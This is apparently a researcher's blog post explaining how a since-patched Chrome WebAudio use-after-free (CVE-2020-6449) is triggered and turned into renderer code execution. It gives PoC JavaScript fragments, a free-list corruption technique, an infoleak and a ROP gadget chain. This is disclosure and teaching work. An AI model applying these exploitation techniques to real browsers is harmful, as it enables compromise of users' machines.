October 27, 2020

Exploiting a textbook use-after-free in Chrome

Man Yue Mo

In March 2020, I reported this use-after-free (UAF) vulnerability in the WebAudio module of Chrome. This is a UAF vulnerability of non-garbage-collected objects, which is allocated by the PartitionAlloc memory allocator. In the blink (which WebAudio is a part of), heap objects are allocated with different memory allocators depending on their types. For example, most garbage collected objects are allocated by Oilpan, while non garbage collected objects are allocated by PartitionAlloc (with the exception of back stores of ArrayBuffer and String, which are allocated in PartitionAlloc even though the object themselves are garbage collected).

In 2019, two of the high profile "exploited-in-the-wild" vulnerabilities in Chrome were UAFs of PartitionAlloc objects in blink. One was CVE-2019-5786, reported by Clement Lecigne of Google's Threat Analysis Group, and the other was CVE-2019-13720, aka WizardOpium, reported by Anton Ivanov and Alexey Kulaev of Kaspersky Labs.

Much of the difficulty in exploiting this kind of vulnerability lies with PartitionAlloc, which separates primitive containers (String, Vectors, ArrayBuffers etc.) from normal, 'executable' objects: primitive containers are allocated in the Buffer and ArrayBuffer partitions, whereas normal objects are allocated in the Fast partition. First, this separation makes it difficult to use a memory corruption in the ArrayBuffer or Buffer partitions to hijack control flow. Second, it makes it difficult to use a memory corruption in the Fast partition to create fake objects with controlled data in the ArrayBuffer or Buffer partitions, because the write primitive is likely to be very limited there. In the two bugs mentioned previously, the UAFs are in the ArrayBuffer partition and the challenge is to break out of the ArrayBuffer partition. The exploits of those bugs are well documented and can be found here for CVE-2019-5786 and here for WizardOpium. A more comprehensive write up of the technique to exploit PartitionAlloc this way can be found here.

In this post, however, we face the opposite challenge, which is to go from a UAF in the Fast partition to get RCE. I'll use CVE-2020-6449 as an example to show this, but the technique itself is more general and is applicable to other situations where a UAF occurs with Fast partition objects.

The vulnerability

The precise details and root cause analysis of the vulnerability can be found in the above link and the Chrome bug ticket, so I'll only summarize the details of the bug here. I'll also assume that readers are already familiar with the details of WebAudio from my previous post.

The bug happens in the DeferredTaskHandler::BreakConnections function:

void DeferredTaskHandler::BreakConnections() {
  ...
  wtf_size_t size = finished_source_handlers_.size();
  if (size > 0) {
    for (auto* finished : finished_source_handlers_) {
      // Break connection first and then remove from the list because that can
      // cause the handler to be deleted.
      finished->BreakConnectionWithLock();
      active_source_handlers_.erase(finished);
    }
    finished_source_handlers_.clear();
  }
}

Normally, active_source_handlers_ is responsible for keeping the raw pointers in finished_source_handlers_ alive. As finished is only erased from active_source_handlers_ after it is used, it is normally OK. However, if we manage to somehow clear active_source_handlers_ without clearing finished_source_handlers_, then finished may have been freed in the above function, which will cause a UAF.

Triggering the bug

To understand how to trigger this bug, it's worth taking a look at another closely related bug which I also reported before CVE-2020-6449.

void DeferredTaskHandler::BreakConnections() {
  ...
  wtf_size_t size = finished_source_handlers_.size();
  if (size > 0) {
    for (auto* finished : finished_source_handlers_) {
      active_source_handlers_.erase(finished);          //<-- finished is now free'd
      finished->BreakConnectionWithLock();              //<-- UaF
    }
    finished_source_handlers_.clear();
  }
}

As we can see in the above snippet, because finished was cleared from active_source_handlers_ before it is used, to trigger this bug, we just need to ensure that active_source_handlers_ is the only handle that keeps finished_source_handlers_ alive at this point, whereas to trigger CVE-2020-6449, we need also to clear active_source_handlers_ in advance.

As explained in the ticket, active_source_handlers_ and finished_source_handlers_ are related to the AudioScheduleSourceNode, which has two subclasses, the ConstantSourceNode and the OscillatorNode. When the start method of an AudioScheduleSourceNode is called, its AudioHandler gets added to active_source_handlers_. So for example, in the PoC for ticket 1057593, the lines

  let src = audioCtx.createConstantSource();
  src.start();

adds the AudioHandler of src to the active_source_handlers_. At this point, both the node src and active_source_handlers_ are responsible for keeping the AudioHandler alive. When stop is called on src, it schedules a stop event for src at time zero. This event will actually be handled by the HandleStoppableSourceNode function, which adds it to finished_source_handlers_. At this point, we can suspend the audio and run some javascript by handling the promise:

  audioCtx.suspend((3 * 128)/3072.0).then(()=>{
    gc();
    audioCtx.resume();
  });

As the constantSource (javascript handle of ConstantSourceNode) created are now stopped, there is nothing to keep it alive and a call to garbage collection (gc) will collect and destroy it. After that, active_source_handlers_ is responsible for keeping finished_source_handlers_ alive. A call to audioCtx.resume will reach BreakConnection and trigger the UAF.

Now that we understand how to trigger the simple version of CVE-2020-6449, all that is needed is to add a step to clear out active_source_handlers_ before we reach BreakConnections. The main difference here is that the only way to clear out active_source_handlers_ is to destroy the javascript execution context, which basically means putting everything inside an iframe and then destroying it. The main file in the new PoC lives in the iframe and also adds a number of new nodes to the audio graph, for example, the onLoad method now creates 2000 PannerNode.

function onLoad() {
  startStop().then((audioCtx) => {
    audioCtx.suspend((3 * 128)/3072.0).then(()=>{
      //======new======
      let dest = audioCtx.createConstantSource();
      dest.start();
      for (let i = 1; i < 2000; i++) {
        dest = dest.connect(audioCtx.createPanner());
      }
      dest.connect(audioCtx.destination);
      //=====new end======
      ....
    });
    audioCtx.startRendering();
  });
}

The startStop method also adds an AudioWorkletNode. The main reason for creating the AudioWorkletNode and PannerNode is to control the timing between the audio thread, where BreakConnection is run, and the main thread, where active_source_handlers_ is cleared. These are there to cause delays in the audio thread so that there is sufficient time to clear out active_source_handlers_ before triggering the bug.

Exploiting the bug

In order to exploit this bug, I'll need to first replace it with an object of similar size and hope that BreakConnectionWithLock will be doing something "useful" in the context of the replaced object. In general, I'd like to have the following:

  1. When calling BreakConnectionWithLock in the context of the replaced object, I want to be able to deduce the location of a heap pointer and the address of a function or vtable etc. The later will allow me to find the address of some loaded libraries and therefore locations of rop gadgets within it. For example, if a pointer address is written to an integer field by BreakConnectionWithLock in the replaced object, then I'll be able to get some pointer addresses by reading out the integer field.
  2. After knowing these addresses, I'd like to be able to create a object that allows me to fake its vtable and have it point to the location of a rop gadget, which I know from 1. Then when I call the virtual function, it will execute the gadget of my choice. This can be achieved, for example, by creating a fake object using an ArrayBuffer or similar data structure so that I can fake the vtable with array entries.

So let's take a look at what BreakConnectionWithLock actually does:

void AudioHandler::BreakConnectionWithLock() {
  deferred_task_handler_->AssertGraphOwner();  //<---- No effect in release build
  connection_ref_count_--;

#if DEBUG_AUDIONODE_REFERENCES
  fprintf(stderr,
          "[%16p]: %16p: %2d: AudioHandler::BreakConnectionWitLock %3d [%3d] "
          "@%.15g\n",
          Context(), this, GetNodeType(), connection_ref_count_,
          node_count_[GetNodeType()], Context()->currentTime());
#endif

  if (!connection_ref_count_)
    DisableOutputsIfNecessary();  //<--- calls virtual function
}

I'm in a bit of luck with this one. The first line is only compiled for a debug build, so I get to avoid a pointer dereference, which could cause a potentially tricky to avoid crash.

The second line is also good. It reduces a counter, so it gives me a limited write primitive that is unlikely to crash. After that, it checks connection_ref_count_ and optionally calls DisableOutputsIfNecessary, which will end up making a virtual function call. At the moment, I'd like to avoid the path that calls a virtual function because without any knowledge of the heap layout, it is likely to just end up in a crash.

In summary, so far we have:

  1. A UAF where the time between free and use can easily be controlled.
  2. A limited write primitive that decrements a field at a specific offset of the freed object by one.
  3. A possibility to make a virtual function call.

As we'll see later, one and two are all I need to exploit this bug.

Object replacement

The first step of a UAF exploit is usually to replace the freed object with a different object of similar size to cause a type confusion, and then try to create an infoleak from it. After that, we can trigger the bug again and replace the freed object with another fake object where we can fake a vtable and have it point to some rop gadgets, etc.

As mentioned before, the memory allocator used to allocate these objects is the PartitionAlloc. From an exploit development point of view, the most important aspects of the PartitionAlloc are:

  1. It is a bucket allocator that maintains a list of freed and allocated objects for each bucket. When an object is freed, it becomes the head of the free list in its bucket, while the previous head of the free list becomes the next free chunk. The next allocated object of size in the same bucket takes the place of this most recently freed object. Within a bin, all chunks are allocated contiguously.
  2. It has 4 different partitions which separates most data containers (backing store of ArrayBuffer, Vector, String, etc.) from "normal" objects.

For now, we only need to care about point 1. I'll discuss point two a bit more later.

The object that gets freed here is a subclass of the AudioScheduledSourceHandler, which is either the ConstantSourceHandler or the OscillatorHandler. The sizes of these objects in the release build of 80.0.3987.137 in linux (the last version before the bug is fixed) are 240 and 312 respectively, which corresponds to bin sizes (225 - 240) and (289 - 320). It's fairly straightforward to find types that are within these bins using CodeQL:

from Type t
where (t.getSize() <= 240) and (t.getSize() > 225)
select t 

After looking through various types in the bins, the class BiquadDSPKernel looks most promising. It can be created from javascript using the AudioContext::createBiquadFilter() function and the field connection_ref_count_ in ConstantSourceHandler that we are able to decrement in BreakConnectionWithLock lines up with biquad_.a1_.allocation of its field biquad_, which is a pointer field in an AudioDoubleArray.

However, allocation_ is only used for creating aligned_data_ and is not used afterwards. This means that if we are to replace the freed ConstantSourceHandler with a BiquadDSPKernel, the value of biquad_.a1_.allocation_ after it is modified by BreakConnectionWithLock won't be used. So this is a dead end... or is it?

Corrupting free list, one step at a time

When I say the value of allocation_ is not used after we modified it as connection_ref_count_, this is not exactly true, because it will get freed when the AudioArray is destroyed.

What it means is that, when AudioArray is freed, allocation_ becomes the head of the free list. However, as we decrease its value by one, this pointer now overlaps with the previous chunk of memory, which may still be in use. While a one byte overlap between the chunks may not be that useful, if we can repeatedly trigger this bug and have biquad_.a1_.allocation_ land on the same place, then we can decrease this pointer repeatedly and create a large enough overlap between two chunks that would cause another type confusion. This can actually be achieved by simply triggering the bug and replacing it with a BiquadDSPKernel each time. As PartitionAlloc will simply reuse the same chunks over and over again (allocate_ here lives in the bin of size 8 * 128 = 1024, which does not get used often), we are guaranteed to end up modifying the same allocation_ pointer everytime. So for example, if I want to decrease the allocation_ pointer value by n, all I need to do is to make this change to the remove function here:

function remove() {
  let frame = document.getElementById("ifrm");
  frame.parentNode.removeChild(frame);

  if (counter < n) {
    //Trigger bug to move chunk backwards
    let biquad = audioCtx.createBiquadFilter();
    counter++;
    delete biquad;
    sleep(700);
    createIframe();
  }
}

The sleep here is just to make sure the objects get garbage collected. In the actual exploit, I have to trigger it 62 times, so it takes a couple of minutes to run.

So far, I have managed to corrupt the free list in the bin of size 1024 to cause overlaps between objects. I'll now use this to create an infoleak that will give me both the address of libchrome and an address of a heap pointer, which will allow me create some controlled data at a known address.

Building an infoleak

In order to build an infoleak, I use the HRTFPanner class, which is of size 1152 and is in the same bin as the allocate_ field of AudioArray that I managed to move. Ideally, I would like to have an HRTFPanner allocated to the location of the corrupted allocation_ pointer so that the beggining of this HRTFPanner will overlap with the end of another object that occupied the previous chunk, as illustrated in the following figure

When I then allocate the HRTFPanner, its vtable and the shared pointer field database_loader_ will map to the end of the object that occupies the previous chunk, so it'd be convenient if I can find an object whose fields can be read off easily in javascript to occupy this chunk. Looking through objects of different sizes, however, does not yield any obvious candidate for this previous chunk.

Moreover, as mentioned before, PartitionAlloc separates the allocations of data containers and normal objects. Whereas objects like HRTFPanner etc. are allocated in the Fast partition, data containers are allocated in the buffer partition or the array buffer partition, so I can't just allocate an dynamically sized object like an ArrayBuffer in javascript, have it overlap with HRTFPanner and read the vtable etc. off its entries.

However, recall how I arrived here. I was using the allocation_ field of an AudioArray to corrupt the free list in the first place, which is an object in the fast partition with a easily controllable size and its contents may also be readable from javascript. While this seems like a good candidate to occupy the "previous chunk", there is a problem here. AudioArray is only used internally as a buffer to store temporary audio data and does not interact with javascript directly. Worse still, in almost all use cases, it is used as a temporary buffer with data getting overwritten to before they can be read from javascript. So even if I can create an AudioArray and overwrites its buffer with the vtable and heap pointers from an overlapping HRTFPanner object, these data will most likely be overwritten before I get to read from it.

Almost all the time, that is. There is one use case, in AudioDelayDSPKernel::Process, where the AudioFloatArray field buffer_ may not be fully overwritten before it gets returned to the user, which allows me to create a specially crafted DelayNode whose buffer_ gets overwritten by a HRTFPanner object once the free list is corrupted, and then retrieve it from the audio output:

  //Create a DelayDSPKernel whose buffer_ has the right size, which will be used to leak data.
  delay_leak = audioCtx.createDelay(0.0908);
  //3/3072 = 1./1024, need to divide by power of 2 to avoid rounding error when converting to double
  delay_leak.delayTime.value =  3 * 0.0009765625;

Rendering an audio graph with this delay node will then enable me to read the vtable and the heap pointer for the database_loader_ field of an HRTFPanner object in the output.

Once I have these two pieces of information, the rest is easy. I just need to create a fake object using another AudioArray in the same bin as the ConstantSourceHandler with a vtable pointing to a rop gadget, then trigger the bug once more to call arbitrary functions with arbitrary arguments.

Another easy way is just to destroy delay_leak and allocate another AudioArray to overwrite the vtable of the HRTFPanner, and then use its virtual destructor to run code. This is actually what I ended up doing. By doing this, I don't even need the original UAF bug to call any virtual function.

In the end, I used this following gadget:

  //mov rax,QWORD PTR [rdi + 0x20]; <-- function call
  //mov rsi,QWORD PTR [rdi + 0x98]; <-- arg0
  //mov rdx,QWORD PTR [rdi + 0xa0]; <-- arg1
  //add rdi, 0x28 <--- arg2

which is roughly at the address of this symbol (which is just one of the callbacks that takes three arguments)

base::internal::Invoker<base::internal::BindState<void (*)(blink::KURL const&, base::WaitableEvent*, std::__1::unique_ptr<blink::WebGraphicsContext3DProvider, std::__1::default_delete<blink::WebGraphicsContext3DProvider> >*), blink::KURL, WTF::CrossThreadUnretainedWrapper<base::WaitableEvent>, WTF::CrossThreadUnretainedWrapper<std::__1::unique_ptr<blink::WebGraphicsContext3DProvider, std::__1::default_delete<blink::WebGraphicsContext3DProvider> > > >, void ()>::RunOnce(base::internal::BindStateBase*)

There are plenty of these callbacks in libchrome which basically give gadgets to call arbitrary functions with arbitrary arguments (idea taken from this post of Tim Becker, which is a great read), although trawling through them to find one with the right type can be tedious.

Using this gadget to call OS::SetPermissions allows me to overwrite page permission of my controlled data to rwx, which allows me to run arbitrary shell code in the renderer.

Conclusions

In this post I've gone through the details of exploiting CVE-2020-6449 and some common strategies and techniques involved in the exploit. We also saw how mitigations in the memory allocator made this bug more difficult to exploit. In the end, I was able to exploit the bug with by simply decrementing a pointer field in a replaced object, which is a rather limited primitive. This shows that when the stars line up, even a limited (and probably not that rare) primitive like this can wreak havoc. Fortunately, with the sandbox architecture in Chrome, another sandbox escape bug is required to compromise Chrome. This shows how tackling security from multiple levels (sandboxing + quick bug fixing + bug finding) really help in improving the security of Chrome.

The full exploit can be found here with some set up notes etc. which I tested against a symbol build of 80.0.3987.137 on Ubuntu.